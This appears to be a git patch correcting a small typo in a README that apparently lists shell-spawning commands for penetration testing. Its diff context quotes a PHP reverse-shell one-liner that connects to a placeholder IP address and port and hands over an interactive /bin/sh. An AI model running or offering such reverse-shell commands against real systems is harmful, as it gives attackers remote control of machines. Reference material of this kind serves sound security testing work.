From f0455095c34e95de6208a23806d1e8606946357d Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 4 Aug 2022 07:00:21 -0400 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4752b2b..a124f28 100644 --- a/README.md +++ b/README.md @@ -482,7 +482,7 @@ php -r ‘$sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3
```bash -# About: A command spawn a new shell using python +# About: A command to spawn a new shell using python # Download: May or may not be installed on server machine # Usage